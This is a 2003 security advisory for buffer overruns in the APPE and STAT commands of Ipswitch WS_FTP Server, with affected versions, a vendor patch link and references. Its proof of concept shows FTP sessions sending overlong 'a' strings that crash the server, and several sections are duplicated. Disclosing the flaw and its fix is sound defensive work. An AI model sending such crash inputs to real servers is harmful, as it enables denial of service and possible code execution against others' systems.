Ipswitch WS_FTP Server FTP Command Buffer Overrun Vulnerabilities
BID:8542
Info
Ipswitch WS_FTP Server FTP Command Buffer Overrun Vulnerabilities
| Bugtraq ID: | 8542 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 04 2003 12:00AM |
| Updated: | Sep 04 2003 12:00AM |
| Credit: | Discovery is credited to pejman davarzani <[email protected]>. |
| Vulnerable: |
Ipswitch WS FTP Server 4.0 1 Ipswitch WS FTP Server 4.0 Ipswitch WS FTP Server 3.4 |
| Not Vulnerable: |
Ipswitch WS FTP Server 4.0 2 |
Discussion
Ipswitch WS_FTP Server FTP Command Buffer Overrun Vulnerabilities
Ipswitch WS_FTP Server is reported to be prone to buffer overruns when handling data supplied to the APPE and STAT FTP commands. An FTP user who supplies excessive input to these commands could potentially execute arbitrary code in the context of the server or cause a denial of service.
Ipswitch WS_FTP Server is reported to be prone to buffer overruns when handling data supplied to the APPE and STAT FTP commands. An FTP user who supplies excessive input to these commands could potentially execute arbitrary code in the context of the server or cause a denial of service.
Exploit / POC
Ipswitch WS_FTP Server FTP Command Buffer Overrun Vulnerabilities
The follow proof of concept has been supplied:
ftp> quote
Command line to send
APPEND aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Connection closed by remote host.
ftp>
ftp> quote
Command line to send stat
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
An exploit has also been made available.
The follow proof of concept has been supplied:
ftp> quote
Command line to send
APPEND aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Connection closed by remote host.
ftp>
ftp> quote
Command line to send stat
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
An exploit has also been made available.
Solution / Fix
Ipswitch WS_FTP Server FTP Command Buffer Overrun Vulnerabilities
Solution:
The vendor has released an update to address this issue. It should be noted that users must be running version 4.0x to install the update.
Ipswitch WS FTP Server 4.0 1
Ipswitch WS FTP Server 4.0
Solution:
The vendor has released an update to address this issue. It should be noted that users must be running version 4.0x to install the update.
Ipswitch WS FTP Server 4.0 1
-
Ipswitch ifs402.exe
ftp://ftp.ipswitch.com/ipswitch/product_support/ws_ftp_server/ifs402.e xe
Ipswitch WS FTP Server 4.0
-
Ipswitch ifs402.exe
ftp://ftp.ipswitch.com/ipswitch/product_support/ws_ftp_server/ifs402.e xe
References
Ipswitch WS_FTP Server FTP Command Buffer Overrun Vulnerabilities
References:
References:
- Ipswitch Homepage (Ipswitch)
- Remote and Local Vulnerabilities In WS_FTP Server (pejman d
)